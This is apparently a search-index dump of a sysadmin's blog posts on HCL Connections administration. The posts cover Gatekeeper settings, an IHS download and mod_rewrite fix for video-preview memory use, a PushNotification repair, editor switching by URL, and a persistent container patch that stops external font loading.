value=\u0026#34;{lang}\u0026#34;/\u0026gt; \u0026lt;/itemSet\u0026gt; \u0026lt;/widgetDef\u0026gt; --\u0026gt; \u0026lt;!-- IBM CONNECTIONS ENGAGEMENT CENTRE - ICEC4Communities --\u0026gt; \u0026lt;templates\u0026gt; \u0026lt;!-- default template will be used to display the default widgets --\u0026gt; \u0026lt;template id=\u0026#34;default\u0026#34;\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;ImportantBookmarks\u0026#34; instanceId=\u0026#34;ImportantBookmarks1\u0026#34; uiLocation=\u0026#34;col3\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;MembersSummary\u0026#34; instanceId=\u0026#34;MembersSummary1\u0026#34; uiLocation=\u0026#34;col3\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;StatusUpdates\u0026#34; instanceId=\u0026#34;StatusUpdates1\u0026#34; uiLocation=\u0026#34;col2statusposts\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;description\u0026#34; instanceId=\u0026#34;description1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Forum\u0026#34; instanceId=\u0026#34;ForumInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Bookmarks\u0026#34; instanceId=\u0026#34;BookmarksInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Files\u0026#34; instanceId=\u0026#34;FilesInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Tags\u0026#34; instanceId=\u0026#34;Tags1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;!-- \u0026lt;widgetInstance defIdRef=\u0026#34;Highlights\u0026#34; instanceId=\u0026#34;Highlights1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt;--\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Blog\u0026#34; instanceId=\u0026#34;Blog1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Wiki\u0026#34; instanceId=\u0026#34;Wiki1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;RichContent\u0026#34; ifGatekeeperSet=\u0026#34;COMMUNITIES_TOP_MENU_WITH_BANNER_DEFAULT_LAYOUT\u0026#34; instanceId=\u0026#34;RichContent1\u0026#34; uiLocation=\u0026#34;banner\u0026#34;/\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;/templates\u0026gt; Sychronize the nodes Restart the application server hosting WidgetContainer and Communities Application Now create a new community and you will get one of the following errors Error with Community Template Wizard: Bad Request Error with default Community create dialog: Your session timed out or a server error occurred. Please resubmit your changes The error message does not help to find the issue, no errors are written to the SystemOut.log.\nSolution Open the Gatekeeper settings on https://YOUR_CNX_URL/connections/config/highway.main.gatekeeper.tiles and change the setting COMMUNITIES_HIGHLIGHTS_AS_OVERVIEW from True to False.\nTo access the gatekeeper settings, you need the admin role in the Common application.\nGatekeeper Setting for COMMUNITIES_HIGHLIGHTS_AS_OVERVIEW No need to restart an application or application server, just go back to Communities and try to create a community again. This time it works without error messages.\n","excerpt":"\u003cp\u003eToday I got the question of how to disable the highlights app in Connections 7. When you follow the \u003ca href=\"https://help.hcltechsw.com/connections/v6/admin/migrate/install_cr3_disable_highlights.html\" target=\"_blank\"\u003edocumentation for Connections 6.0CR6 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n you get an error message (and the document is not available in Connections 7).\u003c/p\u003e\n\u003cp\u003eI commented out the widget definition in \u003ccode\u003ewidgets-config.xml\u003c/code\u003e like described in the documentation for the former release.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/disable_highlights_app_in_connections7/","title":"Disable Highlights App in Connections 7"},{"body":"Our users are often building Highlights and Overview pages within HCL Connections Communities, where they link from one description widget to RTE or from one RTE widget to another.\nWe found that these anchor links often disappear behind the top navigation bar and the users wonder what happened.\nThe link on the left top points to an anchor link on the right side of the Overview Now the anchor link was clicked, and you see the target anchor is not visible I created a customization file in \u0026lt;SHARED DIRECTORY\u0026gt;/customization/themes/hikariTheme/applications/communities.css with the following content:\nhtml { scroll-padding-top: 250px; } Changed the versionStamp in LotusConnections-config.xml and restarted the application servers. Now when we click the link in Communities Overview:\nNow the target anchor is visible Community Highlights The same offset can be seen in the Highlights App and the solution above will solve it there too.\nHighlights with a link pointing to an anchor link Link clicked with default setting Link clicked with the deployed communities.css ","excerpt":"\u003cp\u003eOur users are often building Highlights and Overview pages within HCL Connections Communities, where they link from one description widget to RTE or from one RTE widget to another.\u003c/p\u003e\n\u003cp\u003eWe found that these anchor links often disappear behind the top navigation bar and the users wonder what happened.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/add_offset_to_community_overview_anchor_links/","title":"Add offset to community overview anchor links"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/highlights/","title":"Highlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/links/","title":"Links"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/blog/","title":"Blog"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/preview/","title":"Preview"},{"body":"In late 2021 I had an HCL Connections environment starting swapping, because the AppCluster used more than 30 GB of memory.\nThe system has\ntwo nodes is installed with the medium-sized deployment option About 7500 users with a high adoption rate, because Connections is also used as intranet What happened? Log4j CVE-2021-22448 couldn\u0026rsquo;t be patched immediately for the video streaming platform and some teams shared blog posts with video messages on Connections.\nAnalysis The amount of memory an application server is using is not limited through the Java heap size. File caching happens on top of Java heap.\nSo I found that each user who was opening a video in the file viewer added about the file size to the server memory. Ten users watching a 500 MB video increased the memory usage with 5 GB.\nThe AppCluster members used about 8 GB of memory after startup, but the videos were linked on the start page and so the amount grew to 30-35 GB within minutes and the servers started swapping.\nQuick check in the HTTPServer access.log showed that a lot of mp4 files were accessed since restart and the video length of an hour did the rest.\nI could reproduce with opening multiple browser tabs showing videos, the memory usage increased immediately. So one user can slow down a Connections\u0026rsquo; environment with opening large videos in parallel, until the server starts swapping or even crashes.\nhtop displaying the normal memory amount for AppsCluster_server1 htop displaying the memory amount for AppsCluster_server1 when 1 video is open Step to reproduce Upload a large video to your personal library in Connections check memory usage of AppsCluster (or FilesCluster Open the video in files check memory usage of AppsCluster (or FilesCluster) Open the same video in multiple tabs and check the memory consumption of the application server Workaround / Solution My first idea was to disable video preview at all, but there is no option available.\nGatekeeper has a setting FILEVIEWER_PREVIEW_VIDEOJS, default set to true, but I couldn\u0026rsquo;t find out what changes when you disable it.\nfile-preview-config.xml mentions mp4, but removing it has no effect in the streaming of mp4 in files viewer.\nmime.types with onWebopen only works when inlineDownload is enabled in files-config.xml.\nI opened a case at HCL Support and asked if there is some undocumented option to disable video preview. The first response was enabling \u0026ldquo;Download through IHS\u0026rdquo; , which always was recommended for performance in the Tuning guide .\nDownload through IHS The system with the swapping issue, had some issues with NFS access rights in the past, so file download through IHS was not active, but I gave it a try again.\nRequirements For downloads through IHS the shared directory needs to be mounted on the web server.\nhttps://help.hcltechsw.com/connections/v7/admin/install/t_install_post_files_downloads.html Possible problems\nwrong user (or root user) → use setfacl and add the IHS user to the upload path of files DMZ → firewall exception or additional web server on the WebSphere node (proxy pass from DMZ) mixed operating systems (I can\u0026rsquo;t get this working when WebSphere runs on Windows and IHS on Linux) -\u0026gt; possible workaround is mod_rewrite and rewriting \\ and / Copy Apache module Like in the part about uploading through IHS server, the documentation is not accurate. The HTTPServer in all my environments (installed manually or with the connections-automation project ), is 64-bit! I used /opt/HCL/Connections/xkit/ihs/mod_ibm_local_redirect/linux_x86_64_ap2/mod_ibm_local_redirect.so and copied it to /opt/IBM/HTTPServer/modules.\nhttpd.conf LoadModule ibm_local_redirect_module modules/mod_ibm_local_redirect.so Alias /files_content /opt/IBM/SharedArea/files/upload/ \u0026lt;Directory \u0026#34;/opt/IBM/SharedArea/files\u0026#34;\u0026gt; Order Deny,Allow Deny from all Allow from env=REDIRECT_FILES_CONTENT \u0026lt;/Directory\u0026gt; \u0026lt;Location /files\u0026gt; IBMLocalRedirect On IBMLocalRedirectKeepHeaders X-LConn-Auth,Cache-Control,Content-Type,Content-Disposition,Last-Modified,ETag,Content-Language,Set-Cookie,Title,X-UA-Compatible SetEnv FILES_CONTENT true \u0026lt;/Location\u0026gt; files-config.xml (extended to 1 GB max upload size) \u0026lt;download\u0026gt; \u0026lt;modIBMLocalRedirect enabled=\u0026#34;true\u0026#34; hrefPathPrefix=\u0026#34;/files_content\u0026#34; /\u0026gt; \u0026lt;/download\u0026gt; \u0026lt;file\u0026gt; \u0026lt;media maximumSizeInKb=\u0026#34;1024000\u0026#34;/\u0026gt; \u0026lt;!-- Allow 1 GB uploads --\u0026gt; \u0026lt;/file\u0026gt; \u0026lt;api\u0026gt; \u0026lt;simpleDownloadAPI maximumSizeInKb=\u0026#34;10240\u0026#34;\u0026gt;\u0026lt;/simpleUploadAPI\u0026gt; \u0026lt;!-- WebSphere is used for 10 MB Downloads --\u0026gt; \u0026lt;/api\u0026gt; Restarting the system and the memory usage of the AppsCluster members stayed in a range of the configured java heap size, even when I opened multiple large videos in parallel.\nYou should also enable File uploads through IHS! Upload Files via IBM HTTPServer (mod_ibm_upload) to HCL Connections Setting the WebSphere Application Server WebContainer to synchronous mode The documentation mentions, that you shall enable synchronous mode for the application server hosting the files application. This helps a to prevent the server from using all memory, but it still uses more, and it doesn\u0026rsquo;t free up used memory during my tests.\nhtop displaying the memory amount for AppsCluster_server1 when 5 video is open and synchronous mode is enabled Alternative solution with mod_rewrite I discussed this issue with development through a product case at HCL Support, and finally I got following suggestion to disable preview:\nEnsure to enable the rewrite module. If the following line of text is commented out, uncomment it. If the statement is not present, add it.\nLoadModule rewrite_module modules/mod_rewrite.so Add the following:\n# Block viewer from previewing files RewriteCond %{QUERY_STRING} ^.*(downloadType=view).* [NC] RewriteRule ^(.*)$ - [F,L] Make sure that the configuration lines are in a global context or in each virtual host, depending on your setup.\nHCL Support I tried this in my demo environment:\nVideo Preview in Files shows \u0026ldquo;No preview available\u0026rdquo; and I can download the file Embedding the video with Embed uploaded videos to IBM Connections blog post or wiki page is still working embedded videos do not autoplay and are not that problematic in my eyes image and other previews are working as expected, so a perfect workaround to disable video previews Update 2022-03-09 optimized rewrite rule No need to define lengthy RegExp with wild-card start and end if you only care about the match in the middle No need to define capture groups if you don\u0026rsquo;t use backreferences [F|forbidden] RewriteRule Flags implies L # Block viewer from previewing files RewriteCond %{QUERY_STRING} downloadType=view [NC] RewriteRule .* - [F] Thanks @KroegerBen for the optimization.\nSummary Best solution to prevent large memory consumption is the usage of the download / rewrite module in the HTTP Server. Synchronous mode helped a bit, but I would disable the video preview with mod_rewrite when there is no possibility to use download through IHS.\n","excerpt":"\u003cp\u003eIn late 2021 I had an HCL Connections environment starting swapping, because the AppCluster used more than 30 GB of memory.\u003c/p\u003e\n\u003cp\u003eThe system has\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003etwo nodes\u003c/li\u003e\n\u003cli\u003eis installed with the medium-sized deployment option\u003c/li\u003e\n\u003cli\u003eAbout 7500 users with a high adoption rate, because Connections is also used as intranet\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2022/videostreaming_in_hcl_connections/","title":"Videostreaming in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/webserver/","title":"Webserver"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cfix/","title":"Cfix"},{"body":"Yesterday I updated a Connections environment to the latest CFix. In other environments I found that PushNotification Cluster was not started after the update, like described in the knowledge base document PushNotification broken after upgrading to CFix.65CR1.2201 . In this update the application and cluster were running, but not working at all. Browser console.log showed the error:\nError connecting to push auth sync service /servic/info: RequestError: Unable to load https://cnx-fqdn/push/service/info status: 500 console.log error after installing the CFix So I tweaked the workaround from the knowledge base document above. I used the find command with the option -exec which is great for running commands on all found files. So we can search and move the files in one step.\nOn each Application Server Node, go to this directory: # \u0026lt;WAS_HOME\u0026gt;/profiles/\u0026lt;profile_name\u0026gt;/installedApps/ConnectionsCell/PushNotification.ear cd /opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/PushNotification.ear Move files # Create a backup directory mkdir ~/backup_pns # Find and move the files find -name \\*slf4j\\*1.7.5\\* -exec mv {} ~/backup_pns \\; Restart the PushNotification application or PushNotification Cluster PushNotification is very important for the Desktop Plugins, so don\u0026rsquo;t underestimate the importance of this app. ","excerpt":"\u003cp\u003eYesterday I updated a Connections environment to the latest CFix. In other environments I found that PushNotification Cluster was not started after the update, like described in the knowledge base document \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0096292\" target=\"_blank\"\u003ePushNotification broken after upgrading to CFix.65CR1.2201 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. In this update the application and cluster were running, but not working at all. Browser console.log showed the error:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-gdscript3\" data-lang=\"gdscript3\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#268bd2\"\u003eError\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003econnecting\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eto\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003epush\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eauth\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003esync\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eservice\u003c/span\u003e /\u003cspan style=\"color:#268bd2\"\u003eservic\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003einfo\u003c/span\u003e: \u003cspan style=\"color:#268bd2\"\u003eRequestError\u003c/span\u003e: \u003cspan style=\"color:#268bd2\"\u003eUnable\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eto\u003c/span\u003e \u003cspan style=\"color:#cb4b16\"\u003eload\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehttps\u003c/span\u003e://\u003cspan style=\"color:#268bd2\"\u003ecnx\u003c/span\u003e-\u003cspan style=\"color:#268bd2\"\u003efqdn\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003epush\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003eservice\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003einfo\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003estatus\u003c/span\u003e: \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e500\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2022/kb_pushnotification_broken_after_upgrading_to_cfix.65cr1.2201/","title":"KB: PushNotification broken after upgrading to CFix.65CR1.2201"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/push/","title":"Push"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pushnotification/","title":"Pushnotification"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pushnotification/","title":"Pushnotification"},{"body":"When I test topics with the different Connections editors (CKEditor, Textbox.io and TinyMCE), I always used multiple users in my test environment, installed the editor selector ear and then gave each of the test users a different editor. That\u0026rsquo;s easy with the different j2ee roles, but I always had to use multiple browsers or sandboxes to see them next to each other.\nSelection with URL parameter without changing the user During a support call with Tiny and HCL I learned, that you can switch the editor with a URL parameter. So no need to change the configuration or use the tinyeditorselector.ear.\nAdd the following snippet (case-sensitive!) to the URL you want to call:\nCKEditor ?editor=CKEditor Textbox.io ?editor=textbox.io TinyMCE ?editor=TinyMCE When there is already an option added to the URL, just add this snippet and replace ? with \u0026amp;\nExample Open a blog post: https://preview.hclconnections.net/blogs/97886d2e-9f86-4f49-b74c-b0b525ae7689?lang=en_us this will open the blogs overview, now select New Entry and you are redirected to https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us.\nIn my case this opens the TinyMCE editor as the default:\nSo now lets change the URL to: https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us\u0026amp;editor=textbox.io\nand the same page with Textbox.io is loaded.\nAnd finally change the URL to: https://preview.hclconnections.net/blogs/roller-ui/authoring/weblog.do?method=create\u0026amp;weblog=97886d2e-9f86-4f49-b74c-b0b525ae7689\u0026amp;lang=en_us\u0026amp;editor=CKEditor\nand CKEditor loads and can be used.\nSo a perfect way to fast change to a different editor, do some tests and screenshots and then go back to your default.\nBe aware that some Connections URLs use a #, then you need the additional URL parameter before the # sign!\nWiki Example https://preview.hclconnections.net/wikis/home?lang=en-us#!/wiki/W269d1b93c705_4ebe_9986_1964c6dd6bfa/page/Welcome%20to%20Testing%20Metrics/edit here use https://preview.hclconnections.net/wikis/home?lang=en-us\u0026amp;editor=textbox.io#!/wiki/W269d1b93c705_4ebe_9986_1964c6dd6bfa/page/Welcome%20to%20Testing%20Metrics/edit\n","excerpt":"\u003cp\u003eWhen I test topics with the different Connections editors (CKEditor, Textbox.io and TinyMCE), I always used multiple users in my test environment, installed the editor selector ear and then gave each of the test users a different editor. That\u0026rsquo;s easy with the different j2ee roles, but I always had to use multiple browsers or sandboxes to see them next to each other.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/change_connections_editor_on_the_fly/","title":"Change the Connections editor on the fly"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/cnx/","title":"Cnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/editor/","title":"Editor"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/editor/","title":"Editor"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ibmcnx/","title":"Ibmcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tiny/","title":"Tiny"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiny/","title":"Tiny"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orient-me/","title":"Orient Me"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/trace/","title":"Trace"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/troubleshooting/","title":"Troubleshooting"},{"body":"HCL Support published a collection of links to MustGather informations for Connections and addons. That\u0026rsquo;s the perfect starting point to start troubleshooting and collecting logs for your support cases.\nCollecting Data: Repository of MustGather for Connections ","excerpt":"\u003cp\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=csm_index\" target=\"_blank\"\u003eHCL Support \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n published a collection of links to MustGather informations for Connections and addons. That\u0026rsquo;s the perfect starting point to start troubleshooting and collecting logs for your support cases.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0020711\" target=\"_blank\"\u003eCollecting Data: Repository of MustGather for Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2022/mustgather/","title":"Useful KB Doc: MustGather for Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/container/","title":"Container"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/image/","title":"Image"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/patch/","title":"Patch"},{"body":"I wrote about font loading from external CDN in the post Hiding The Create Community Button 2nd last year and hoped this is finally fixed for all Connections applications. A good summary on the reasons to not allow external font loading is Blocking Web Fonts for Speed and Privacy .\nSo I checked with a Connections 7 deployment with the latest CFix (CFix.70.2112) deployed, if this is still an issue with Connections.\nIn former Connections\u0026rsquo; versions we found external fonts loaded in Orient Me (/social), Communities Catalog (/communities) and the Admin panel (/cnxadmin/).\nOrient Me and the Community catalog are loading fonts from Unpkg and the Admin Panel from fonts.gstatic.com.\nThere was a long discussion in the Connections Community Forum which ended with a comment of the Connections Product Management that this will be fixed in a future version.\nIn the meantime the font loading in Communities catalog is fixed, when the CATALOG_CARD_UPDATED=true, but Orient Me and Admin panel are still loading external fonts. That can be related to the fact that Component Pack didn\u0026rsquo;t get updates since May 2021. As I don\u0026rsquo;t want to wait any longer, I had a look if we can fix this on our own.\nOrient Me is running as container, so it is not enough to edit a file, because this will be overwritten when the container is deleted and gets recreated from the default image.\nI hate to type -n connections over and over again with the kubectl command. To set the default namespace to connections, run this command:\nkubectl config set-context --current --namespace=connections This is saved in ~/.kube/config and is persistent.\nEdit the pod After some research, the easiest way to remove the external CDN from the Orient Me container is the following way:\nkubectl get pods ... orient-web-client-77dbff4d58-4h69x 1/1 Running 0 132m ... Now we run a shell in the running Orient Me container (use the name you found with the command above, when you have multiple pods running, use one of them, but make a note of the name):\nkubectl exec -it orient-web-client-77dbff4d58-4h69x -- sh Some grep and find showed, that the only file we need to change for left-to-right languages is /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.css and /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.rtl.css for right-to-left.\nAdditionally I searched within the container and in the requests of my browser if I can find the used fonts on the system. I found that all IBM*.woff2 fonts are included in the Orient Me container, but also they are already used in several apps within Connections. The Communities catalog for example load them from https://\u0026lt;connections-host\u0026gt;/connections/ui/dist/.\nRewrite the font URL in the CSS file I wanted to avoid massive changes in the container, so I decided to change the fonts URLs to this path. Run the following in the container shell you opened above:\nsed -i \u0026#39;s#https://unpkg.com/carbon-components@latest/src/globals/#/connections/ui/dist/#g\u0026#39; /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.css sed -i \u0026#39;s#https://unpkg.com/carbon-components@latest/src/globals/#/connections/ui/dist/#g\u0026#39; /home/ibm/app/public/dist/js/ic-orient-4a833568f93c16c17c7c5e29f6f073d6.rtl.css Now when we open Orient Me (/social) it already loads the font directly from Connections, but this change is not persistent, it will be overwritten when you delete the Orient Me pod.\nMake your patch persistent I this should be run on the node where the Orient Me container you changed is running. To find it:\nkubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES ... orient-web-client-77dbff4d58-4h69x 1/1 Running 0 146m 192.168.68.210 cnx7-cp.stoeps.home \u0026lt;none\u0026gt; \u0026lt;none\u0026gt; ... Find the Docker image docker ps | grep orient-web-client-77dbff4d58-4h69x 4b1ed5bb12d6 fd0bb831f5e6 \u0026#34;docker-entrypoint.s…\u0026#34; 2 hours ago Up 2 hours k8s_orient-web-client_orient-web-client-77dbff4d58-4h69x_connections_f5b463e7-6c77-446a-92e0-56115765bcff_0 bcdd9ba8c2c6 k8s.gcr.io/pause:3.2 \u0026#34;/pause\u0026#34; 2 hours ago Up 2 hours k8s_POD_orient-web-client-77dbff4d58-4h69x_connections_f5b463e7-6c77-446a-92e0-56115765bcff_0 Here we need the line with the docker-entrypoint command and copy the value from the first column (4b1ed5bb12d6)\nLet\u0026rsquo;s check the used tag for our Orient Me image:\ndocker image ls | grep orient-web cnx7-cp.stoeps.home:5000/connections/orient-web-client 20210426-155510 d4ce676e668e 3 hours ago 577MB Here we see the registry URL: cnx7-cp.stoeps.home:5000, image name: connections/orient-web-client and tag: 20210426-155510. Now we can commit the change and write a new image with a different timestamp as tag. Use the container hash 4b1ed5bb12d6 from above to identify and tag the right image!\ndocker commit 4b1ed5bb12d cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Check the image names and tags docker image ls | grep orient-web cnx7-cp.stoeps.home:5000/connections/orient-web-client 20220114-151700 fd0bb831f5e6 3 hours ago 577MB cnx7-cp.stoeps.home:5000/connections/orient-web-client 20210426-155510 d4ce676e668e 3 hours ago 577MB Check the Entrypoint of old and new image docker inspect --format=\u0026#39;{{ .Config.Entrypoint }}\u0026#39; cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 docker inspect --format=\u0026#39;{{ .Config.Entrypoint }}\u0026#39; cnx7-cp.stoeps.home:5000/connections/orient-web-client:20210426-155510 This should return the same ENTRYPOINT! If not, go back to the commit step and use:\ndocker commit --change=\u0026#39;ENTRYPOINT [\u0026#34;\u0026lt;Use return value of the inspect command here\u0026gt;\u0026#34;]\u0026#39; 4b1ed5bb12d cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Upload the image to the docker registry: docker push cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-151700 Update deployment Now we only need to update the deployment that it uses our new container image (always keep the old image, so you can revert back).\nkubectl edit deployment orient-web-client This opens a yaml with the configuration of the pod. Search for the line:\nimage: cnx7-cp.stoeps.home:5000/connections/orient-web-client:20210426-151700 and change it to\nimage: cnx7-cp.stoeps.home:5000/connections/orient-web-client:20220114-155510 Save and close the file (default uses vi, so :wq will save and close), this will restart all container in this deployment. Wait some seconds, check if Orient Me is running again, then you can test if the fonts are loaded from a local resource or unpkg.\nNormally changing the deployment will restart all pods of the deployment. You can run the following command to restart Orient Me to be sure that it pulls the new image:\nkubectl rollout restart deployment orient-web-client Comment In former talks I showed the advantages of containers. Building them automatically on a regular basis can help to get a more secure product. So even when you don\u0026rsquo;t want to build a container again (which should be a no-brainer with the right ci/cd pipelines), you can add the two lines of sed and one piece is fixed.\nThe book Hacking Kubernetes from Michael Hausenblas and Andrew Martin recommend rebuilding containers all 30 days. So I see forward when we get the next updates for Component Pack and until then I will change this on my own.\n","excerpt":"\u003cp\u003eI wrote about font loading from external CDN in the post \u003ca href=\"/posts/2021/hide-community-button-second/\"\u003eHiding The Create Community Button 2nd\u003c/a\u003e\n last year and hoped this is finally fixed for all Connections applications. A good summary on the reasons to not allow external font loading is \u003ca href=\"https://collinmbarrett.com/block-web-fonts/\" target=\"_blank\"\u003eBlocking Web Fonts for Speed and Privacy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eSo I checked with a Connections 7 deployment with the latest CFix (CFix.70.2112) deployed, if this is still an issue with Connections.\u003c/p\u003e\n\u003cp\u003eIn former Connections\u0026rsquo; versions we found external fonts loaded in Orient Me (\u003ccode\u003e/social\u003c/code\u003e), Communities Catalog (\u003ccode\u003e/communities\u003c/code\u003e) and the Admin panel (\u003ccode\u003e/cnxadmin/\u003c/code\u003e).\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/patch_orientme_container/","title":"Patch Orient Me Container"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nEngage \u0026ndash; https://engage.ug HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html) Dachnug49 \u0026ndash; https://dnug.de/dachnug49/ HCL Connections Admin Toolbox Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html) Froscon \u0026ndash; https://froscon.org Checkliste fuer Universaldilettanten gemeinsam mit Martin Leyrer Checkliste fuer Universaldilettanten Video Troubleshooting von Enterprise Web Applikationen mit Open Source Tools Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools Video Slides Your browser does not support this, go to the presentation directly: [Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools](https://share.stoeps.de/froscon2022-oss-toolbox.html) ","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"engage----httpsengageug\"\u003eEngage \u0026ndash; \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003ehttps://engage.ug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#engage----httpsengageug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage2022-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/engage2022-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html)\n\u003c/iframe\u003e\n\u003ch2 id=\"dachnug49----httpsdnugdedachnug49\"\u003eDachnug49 \u0026ndash; \u003ca href=\"https://dnug.de/dachnug49/\" 